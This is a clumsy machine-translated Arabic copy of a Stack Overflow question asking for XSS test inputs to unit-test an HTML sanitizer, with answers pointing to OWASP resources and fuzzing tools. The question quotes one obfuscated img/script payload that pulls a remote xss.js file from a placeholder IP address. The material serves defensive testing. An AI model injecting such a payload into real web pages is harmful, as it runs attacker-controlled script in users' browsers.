XSS التعذيب الاختبار - أنها لا وجود لها؟
https://stackoverflow.com/questions/255723
-
05-07-2019 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russianسؤال
وأنا أبحث لكتابة مادة معقمة أتش تي أم أل، وبالطبع لاختبار / إثبات أنه يعمل بشكل صحيح، وأنا بحاجة إلى مجموعة من الأمثلة XSS الى ارض الملعب ضد لنرى كيف تقوم بها. وهنا سبيل المثال لطيفة من الترميز الرعب
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
وأنا أعرف هناك مايم التعذيب اختبار حيث يتألف من عدة متداخلة رسائل البريد الإلكتروني مع المرفقات التي يتم استخدامها لاختبار أجهزة فك التشفير مايم (إذا كانت يمكن فك بشكل صحيح، ثم أنها قد ثبت للعمل). أنا في الأساس تبحث عن equivilent لXSS، أي قائمة من الأمثلة على أتش تي أم أل المراوغة أستطيع أن رمي في بلدي مادة معقمة فقط للتأكد من أنها تعمل موافق.
وإذا كان أي شخص أيضا أي موارد جيدة حول كيفية كتابة مادة معقمة (أي ما يستغل شيوعا الناس في محاولة لاستخدام، وما إلى ذلك) أن يكون لديهم تلقى بامتنان للغاية.
وشكرا مقدما: -)
وتحرير: آسف إذا لم يكن ذلك واضحا من قبل، لكني لم اكن بعد مجموعة من الاختبارات التعذيب حتى أتمكن من كتابة وحدة الاختبارات لمادة معقمة، وليس اختبار في المستعرض، الخ قد حان البيانات المصدر في نظرية من أي مكان - وليس مجرد متصفح
المحلول
ونلقي نظرة على قائمة الغش XSS: https://www.owasp.org/ index.php / XSS_Filter_Evasion_Cheat_Sheet
نصائح أخرى
XSS عني هو فايرفوكس البرنامج المساعد عظيم يمكنك تشغيل ضد المطهر الخاص بك.
OWASP . لديهم توجيهات جيدة على كيفية عمل XSS، ما الذي تبحث عنه، وحتى WebGoat المشروع، حيث يمكنك محاولة يدك على موقع عرضة للخطر.
وكنت قد تحاول jsfunfuzz جيسي Ruderman في ( HTTP: //www.squarefree كوم / 2007/08/02 / التعريف بمفهوم jsfunfuzz / ) أن يلقي بيانات عشوائية في جافا سكريبت الخاصة بك في محاولة لكسرها. يبدو أن فريق فايرفوكس واستخدامه هذا نجاحا كبيرا.
